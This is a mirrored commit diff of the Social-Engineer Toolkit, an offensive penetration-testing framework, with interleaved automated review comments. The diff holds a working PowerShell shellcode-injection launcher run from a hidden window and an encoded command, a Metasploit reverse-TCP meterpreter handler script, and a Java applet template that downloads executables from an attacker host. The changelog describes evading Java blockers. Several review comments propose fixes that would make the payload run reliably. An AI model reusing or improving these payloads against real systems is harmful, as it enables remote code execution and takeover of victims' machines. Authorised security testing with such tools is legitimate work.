mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-26 14:30:18 +00:00
Updated a number of features
This commit is contained in:
parent
30fbc15dbe
commit
ca9f1fb2cf
11 changed files with 49 additions and 38 deletions
|
@ -5,8 +5,6 @@ Written by: David Kennedy (ReL1K)
|
||||||
|
|
||||||
Company: [TrustedSec](https://www.trustedsec.com)
|
Company: [TrustedSec](https://www.trustedsec.com)
|
||||||
|
|
||||||
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
|
|
||||||
|
|
||||||
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
|
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
|
||||||
|
|
||||||
Please read the LICENSE under readme/LICENSE for the licensing of SET.
|
Please read the LICENSE under readme/LICENSE for the licensing of SET.
|
||||||
|
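Review bot: dropping the `Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)` line leaves the README with no pointer to where contributors are credited; since the same three names move to a new "Former Developers on SET:" section of CREDITS in this commit, a one-line reference to readme/CREDITS here would keep the README self-explanatory rather than silently losing the names.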
@ -23,5 +21,3 @@ For bug reports or enhancements, please open an issue here https://github.com/tr
|
||||||
|
|
||||||
- Linux
|
- Linux
|
||||||
- Windows (experimental)
|
- Windows (experimental)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,17 @@
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
version 6.0.2
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
|
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
|
||||||
|
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
|
||||||
|
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
|
||||||
|
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
|
||||||
|
* fixed coloring when exiting and alignment for purpose of good disclaimer
|
||||||
|
* added print_status to bleeding edge tracking
|
||||||
|
* fixed unresponsive powershell injection when uses windows 8
|
||||||
|
* changed java applet user agent string inside applet to evade java blockers
|
||||||
|
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
version 6.0.1
|
version 6.0.1
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
|
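Review bot: the entries `shrunk the powershell injection code command` and `slimmed down actual encoded powershell injection code` are not backed by the code in this diff: the `powershell_command` string in `generate_powershell_alphanumeric_payload` is identical in both columns of the @ -1245 hunk, and the only visible shortening is `-win hidden` to `-win hid` in the three launcher files. Either the slimmed routine is missing from the commit or the entries describe a different change; worth reconciling before the 6.0.2 tag. Two wording points while the log is open: `fixed unresponsive powershell injection when uses windows 8` should read `when used on Windows 8`, and `removed old ID and value parameters from the Java Applet database` is only half true as committed, since one applet template drops `IDREPLACEHERE` while the other gains it.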
@ -62,6 +62,9 @@ Special thanks to the following people who have contributed to SET:
|
||||||
The Social-Engineer Development Team:
|
The Social-Engineer Development Team:
|
||||||
|
|
||||||
Dave Kennedy (ReL1K)
|
Dave Kennedy (ReL1K)
|
||||||
|
|
||||||
|
Former Developers on SET:
|
||||||
|
|
||||||
JR DePre (pr1me)
|
JR DePre (pr1me)
|
||||||
Thomas Werth
|
Thomas Werth
|
||||||
Joey Furr (j0fer)
|
Joey Furr (j0fer)
|
||||||
|
|
|
@ -1,27 +1,17 @@
|
||||||
|
|
||||||
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
|
Copyright 2014, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
|
||||||
All rights reserved.
|
All rights reserved.
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||||
|
|
||||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
|
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||||
in the documentation and/or other materials provided with the distribution.
|
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||||
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
|
|
||||||
this software without specific prior written permission.
|
|
||||||
|
|
||||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
|
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
|
|
||||||
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
|
||||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
|
|
||||||
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
|
|
||||||
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
|
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
|
||||||
|
|
||||||
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
|
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
|
||||||
|
|
||||||
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
|
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen).
|
||||||
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
|
|
||||||
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
|
|
||||||
holds the right to refuse the hug or the beer.
|
|
||||||
|
|
|
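Review bot: `Copyright 2013` becoming `Copyright 2014` drops the original year; a notice normally extends the range (`Copyright 2013-2014`) rather than replacing it, since the 2013 code is still covered. Separately, the reflow of every wrapped paragraph onto a single line is mixed into the same hunk as the year bump and the new `(most likely will never happen)` parentheticals, which makes the substantive changes hard to spot; a whitespace-only reflow is better as its own commit.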
@ -145,9 +145,7 @@ try:
|
||||||
print line.rstrip()
|
print line.rstrip()
|
||||||
|
|
||||||
print bcolors.RED + """
|
print bcolors.RED + """
|
||||||
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
|
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
|
||||||
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
|
|
||||||
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
|
|
||||||
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
|
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
|
||||||
if choice == "yes" or choice == "y":
|
if choice == "yes" or choice == "y":
|
||||||
filewrite = file("src/agreement4", "w")
|
filewrite = file("src/agreement4", "w")
|
||||||
|
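Review bot: the reflow of the terms string is fine, but the acceptance check two lines below it, `if choice == "yes" or choice == "y":`, is case-sensitive, so typing `Y` or `Yes` at the `[y/n]` prompt falls through to the exit branch; comparing `choice.strip().lower()` would match what the prompt advertises. The string itself still reads `you will only use this tool for lawful purposes only` (doubled `only`), which could be fixed while this line is being touched.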
@ -155,7 +153,7 @@ yes (only one time), you agree to the terms of service and that you will only us
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
print bcolors.ENDC
|
print bcolors.ENDC
|
||||||
else:
|
else:
|
||||||
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
|
print bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
|
||||||
sys.exit()
|
sys.exit()
|
||||||
|
|
||||||
while 1:
|
while 1:
|
||||||
|
|
|
@ -24,6 +24,7 @@ try:
|
||||||
from Crypto.Cipher import AES
|
from Crypto.Cipher import AES
|
||||||
|
|
||||||
except ImportError:
|
except ImportError:
|
||||||
|
|
||||||
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
|
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
@ -229,7 +230,7 @@ def print_error(message):
|
||||||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||||
|
|
||||||
def get_version():
|
def get_version():
|
||||||
define_version = '6.0'
|
define_version = '6.0.2'
|
||||||
return define_version
|
return define_version
|
||||||
|
|
||||||
class create_menu:
|
class create_menu:
|
||||||
|
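Review bot: `define_version = '6.0.2'` jumps straight from `'6.0'`, so the 6.0.1 release listed in the CHANGELOG shipped reporting itself as 6.0. Keeping the version string in one place that both `get_version()` and the CHANGELOG header derive from would stop the two drifting again.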
@ -277,11 +278,13 @@ def meta_path():
|
||||||
else: msf_path = msf_path + "/"
|
else: msf_path = msf_path + "/"
|
||||||
trigger = 0
|
trigger = 0
|
||||||
if not os.path.isdir(msf_path):
|
if not os.path.isdir(msf_path):
|
||||||
|
|
||||||
# specific for kali linux
|
# specific for kali linux
|
||||||
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
|
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
|
||||||
msf_path = "/opt/metasploit/apps/pro/msf3/"
|
msf_path = "/opt/metasploit/apps/pro/msf3/"
|
||||||
trigger = 1
|
trigger = 1
|
||||||
# specific for backtrack5
|
|
||||||
|
# specific for backtrack5 and other backtrack versions
|
||||||
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
|
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
|
||||||
msf_path = "/opt/framework3/msf3/"
|
msf_path = "/opt/framework3/msf3/"
|
||||||
trigger = 1
|
trigger = 1
|
||||||
|
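Review bot: the comment `# specific for backtrack5 and other backtrack versions` is accurate, but the detection it labels is a chain of independent `if os.path.isfile(...)` blocks rather than `if`/`elif`, so when more than one install is present the last match wins, not the first: `/opt/metasploit/apps/pro/msf3/` is overridden by `/opt/framework3/msf3/`, and both by the later `/usr/bin/msfconsole` check that sets `msf_path = ""`. If that precedence is intentional it deserves a comment; otherwise `elif` makes it explicit and stops `trigger = 1` being assigned several times.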
@ -294,6 +297,7 @@ def meta_path():
|
||||||
if os.path.isfile("/usr/bin/msfconsole"):
|
if os.path.isfile("/usr/bin/msfconsole"):
|
||||||
msf_path = ""
|
msf_path = ""
|
||||||
trigger = 1
|
trigger = 1
|
||||||
|
|
||||||
# specific for pwnpad and pwnplug (pwnie express)
|
# specific for pwnpad and pwnplug (pwnie express)
|
||||||
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
|
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
|
||||||
msf_path = "/opt/metasploit-framework"
|
msf_path = "/opt/metasploit-framework"
|
||||||
|
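Review bot: `msf_path = "/opt/metasploit-framework"` for pwnpad/pwnplug is the one branch without a trailing slash, while the config branch above it explicitly appends one (`else: msf_path = msf_path + "/"`) and the other detected paths end in `/`. Any caller that concatenates rather than formats with `"%s/msfconsole"` would break only for this branch; normalising once with `os.path.join` at the point of return would remove the inconsistency.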
@ -307,6 +311,8 @@ def meta_path():
|
||||||
print_error("Please configure in the config/set_config.")
|
print_error("Please configure in the config/set_config.")
|
||||||
return_continue()
|
return_continue()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
# if we are using windows
|
||||||
if check_os() == "windows":
|
if check_os() == "windows":
|
||||||
print_warning("Metasploit payloads are not currently supported. This is coming soon.")
|
print_warning("Metasploit payloads are not currently supported. This is coming soon.")
|
||||||
msf_path = ""
|
msf_path = ""
|
||||||
|
@ -425,6 +431,8 @@ def bleeding_edge():
|
||||||
print_status("Bleeding edge already active..Moving on..")
|
print_status("Bleeding edge already active..Moving on..")
|
||||||
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
|
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
# else lets add them if they want
|
||||||
else:
|
else:
|
||||||
print_status("Adding Kali bleeding edge to sources.list for updates.")
|
print_status("Adding Kali bleeding edge to sources.list for updates.")
|
||||||
# we need to add repo to kali file
|
# we need to add repo to kali file
|
||||||
|
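Review bot: the `apt-get upgrade -f -y --force-yes; apt-get dist-upgrade -f -y --force-yes` command that runs unconditionally whenever bleeding-edge is already active is a supply-chain hazard: `--force-yes` tells apt to proceed past authentication failures, so a package whose signature does not verify is installed anyway, and a full `dist-upgrade` is far more than a toolkit update should do to a user's system. `-y` alone keeps the non-interactive behaviour while leaving signature checking in place, and the system upgrade should be opt-in rather than a side effect of `bleeding_edge()`.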
@ -451,6 +459,7 @@ def update_set():
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
bleeding_edge()
|
bleeding_edge()
|
||||||
|
|
||||||
|
# if we aren't running Kali :(
|
||||||
else:
|
else:
|
||||||
peinr_info("Kali-Linux not detected, manually updating..")
|
peinr_info("Kali-Linux not detected, manually updating..")
|
||||||
print_info("Updating the Social-Engineer Toolkit, be patient...")
|
print_info("Updating the Social-Engineer Toolkit, be patient...")
|
||||||
|
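Review bot: `peinr_info("Kali-Linux not detected, manually updating..")` in the `else:` branch looks like a typo for `print_info`; unless a `peinr_info` is defined elsewhere, every non-Kali user who runs the updater hits a `NameError` before `print_info("Updating the Social-Engineer Toolkit, be patient...")` is reached. It is unchanged context here, but since the hunk only adds a comment above that branch this is the right moment to fix it.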
@ -1245,8 +1254,10 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
|
||||||
|
|
||||||
# heres our shellcode prepped and ready to go
|
# heres our shellcode prepped and ready to go
|
||||||
shellcode = newdata[:-1]
|
shellcode = newdata[:-1]
|
||||||
|
|
||||||
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
|
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
|
||||||
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
|
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
|
||||||
|
|
||||||
# unicode and base64 encode and return it
|
# unicode and base64 encode and return it
|
||||||
return base64.b64encode(powershell_command.encode('utf_16_le'))
|
return base64.b64encode(powershell_command.encode('utf_16_le'))
|
||||||
|
|
||||||
|
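Review bot: the `VirtualAlloc` call inside `powershell_command`, `$w::VirtualAlloc(0,0x1000,$size,0x40)`, has its second and third arguments swapped relative to the P/Invoke signature declared just above it (`VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)`): the allocation is always 0x1000 bytes and `$size` is passed as the allocation type. That only works because `$size` defaults to 0x1000, which happens to be `MEM_COMMIT`; once `$sc.Length -gt 0x1000` the code sets `$size` to the shellcode length, which is then passed as an invalid allocation flag, while the `memset` loop still writes `$sc.Length` bytes into a 4 KB region. The intended call is `$w::VirtualAlloc(0,$size,0x1000,0x40)`.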
@ -1261,7 +1272,6 @@ def generate_shellcode(payload,ipaddr,port):
|
||||||
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
|
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
|
||||||
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
|
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
|
||||||
# return data
|
# return data
|
||||||
print data
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
# this will take input for shellcode and do a replace for IP addresses
|
# this will take input for shellcode and do a replace for IP addresses
|
||||||
|
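Review bot: dropping the debug `print data` is right; the `# return data` comment directly above the real `return data` is leftover from the same debugging session and can go with it. The `repls` replace chain also silently assumes `data` is C-formatted `unsigned char buf[]` output, so a one-line comment naming that expectation would help the next reader.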
@ -1602,18 +1612,18 @@ def bleeding_edge():
|
||||||
# first check if we are actually using Kali
|
# first check if we are actually using Kali
|
||||||
kali = check_kali()
|
kali = check_kali()
|
||||||
if kali == "Kali":
|
if kali == "Kali":
|
||||||
print "[*] Checking to see if bleeding-edge repos are active."
|
print_status("Checking to see if bleeding-edge repos are active.")
|
||||||
# check if we have the repos enabled first
|
# check if we have the repos enabled first
|
||||||
fileopen = file("/etc/apt/sources.list", "r")
|
fileopen = file("/etc/apt/sources.list", "r")
|
||||||
kalidata = fileopen.read()
|
kalidata = fileopen.read()
|
||||||
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
|
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
|
||||||
print "[*] Bleeding edge already active..Moving on.."
|
print_status("Bleeding edge already active..Moving on..")
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
print "[!] Bleeding edge repos were not detected. This is recommended."
|
print_warning("Bleeding edge repos were not detected. This is recommended.")
|
||||||
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
|
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
|
||||||
if enable == "y" or enable == "yes":
|
if enable == "y" or enable == "yes":
|
||||||
print "[*] Adding Kali bleeding edge to sources.list for updates."
|
print_status("Adding Kali bleeding edge to sources.list for updates.")
|
||||||
# we need to add repo to kali file
|
# we need to add repo to kali file
|
||||||
# we will rewrite the entire apt in case not all repos are there
|
# we will rewrite the entire apt in case not all repos are there
|
||||||
filewrite = file("/etc/apt/sources.list", "w")
|
filewrite = file("/etc/apt/sources.list", "w")
|
||||||
|
|
|
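Review bot: this `def bleeding_edge():` at line 1602 is the second definition of that name in what the monotonically increasing hunk offsets (24, 229, 277, 294, 307, 425, 451, 1245, 1261, 1602) indicate is a single file, the first being the one in the @ -425 hunk; Python keeps whichever `def` runs last, so only this version is ever called and the other is dead code. Beyond the duplication, `file("/etc/apt/sources.list", "w")` truncates the whole file before rewriting it, destroying any entries the user added, and `fileopen` is never closed. Writing the bleeding-edge line to its own file under `/etc/apt/sources.list.d/` would leave the user's `sources.list` untouched and make the "already active" check a simple existence test.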
@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
|
||||||
|
|
||||||
x86 = file(setdir + "/x86.powershell", "r")
|
x86 = file(setdir + "/x86.powershell", "r")
|
||||||
x86 = x86.read()
|
x86 = x86.read()
|
||||||
x86 = "powershell -nop -win hidden -noni -enc " + x86
|
x86 = "powershell -nop -win hid -noni -enc " + x86
|
||||||
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||||
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||||
filewrite.write(x86)
|
filewrite.write(x86)
|
||||||
|
|
|
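Review bot: `-win hid` shortens the command, but whereas `-win` is safely resolved as an unambiguous prefix of powershell.exe's `-WindowStyle` switch name, `hid` abbreviates the enum value `Hidden`, and powershell.exe is not guaranteed to accept prefixes of enum values on the command line; a rejected value prints usage and the payload never runs. Please confirm `-win hid` on each PowerShell version the injection targets (the CHANGELOG mentions Windows 8) before it replaces `hidden`; `-w hidden` is within one character of the same length and is known to parse.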
@ -64,7 +64,7 @@ try:
|
||||||
|
|
||||||
x86 = file(setdir + "/x86.powershell", "r")
|
x86 = file(setdir + "/x86.powershell", "r")
|
||||||
x86 = x86.read()
|
x86 = x86.read()
|
||||||
x86 = "powershell -nop -window hidden -noni -enc " + x86
|
x86 = "powershell -nop -win hid -noni -enc " + x86
|
||||||
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||||
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||||
filewrite.write(x86)
|
filewrite.write(x86)
|
||||||
|
|
|
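Review bot: this block (`file(setdir + "/x86.powershell", "r")`, prepend the launcher, write `reports/powershell/x86_powershell_injection.txt`) is now byte-for-byte the same in three files (`deploy_hex2binary`, this one and the powershell menu), and the commit had to touch all three to change one flag. Moving it into a single helper in setcore next to `generate_powershell_alphanumeric_payload` would make the next flag change a one-line fix and would also be the place to close the file handle, which none of the copies do (`x86 = file(...)` followed by `x86 = x86.read()` rebinds the name without closing).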
@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
|
||||||
# here we format everything for us
|
# here we format everything for us
|
||||||
x86 = file(setdir + "/x86.powershell", "r")
|
x86 = file(setdir + "/x86.powershell", "r")
|
||||||
x86 = x86.read()
|
x86 = x86.read()
|
||||||
x86 = "powershell -nop -windows hidden -noni -enc " + x86
|
x86 = "powershell -nop -win hid -noni -enc " + x86
|
||||||
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||||
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||||
filewrite.write(x86)
|
filewrite.write(x86)
|
||||||
|
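Review bot: unifying the three spellings (`-win hidden`, `-window hidden`, `-windows hidden`) into one is worthwhile, but the new value `hid` abbreviates an enum value rather than a switch name and needs a test against the targeted powershell.exe versions before it replaces `hidden` in all three launchers at once; a parse failure here leaves no session at all rather than a visible window.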
@ -53,7 +53,7 @@ if powershell_menu_choice != "99":
|
||||||
# if we want to start the listener
|
# if we want to start the listener
|
||||||
if choice == 'YES':
|
if choice == 'YES':
|
||||||
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
|
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
|
||||||
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
|
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
msf_path = meta_path()
|
msf_path = meta_path()
|
||||||
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
|
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
|
||||||
|
|
|
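Review bot: `set ExitOnSession false` together with `exploit -j` is the right combination for a handler that should keep accepting sessions, and `LPORT` fixes the case. Two things remain in the context below it: `msf_path = meta_path()` is used without checking the result, yet `meta_path()` returns `False` when no install is found (`return_continue()` then `return False` in the @ -307 hunk) and `""` when `/usr/bin/msfconsole` is detected, so the `"ruby %s/msfconsole"` format yields `ruby False/msfconsole` or `ruby /msfconsole` in those cases; bail out on `False` and handle the empty path (plain `msfconsole`) before calling `Popen`. And since both `msf_path` and `setdir` are interpolated into a `shell=True` command, a space or shell metacharacter in the SET directory breaks it; passing an argument list without `shell=True` avoids that.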
@ -1 +1 @@
|
||||||
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
<applet code="Java.class" width="1" height="1" archive="Signed_Update.jar"><param name="name"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
||||||
|
|
|
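Review bot: after removing `id="IDREPLACEHERE"` and `value="IDREPLACEHERE"`, the first `<param name="name">` is left without a `value` attribute; a valueless param does nothing for the applet and is just a leftover, so drop the element entirely, or keep a value if `Java.class` still reads it. Worth checking as well that whatever substitutes `IDREPLACEHERE` at run time does not still expect the marker in this template.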
@ -1 +1 @@
|
||||||
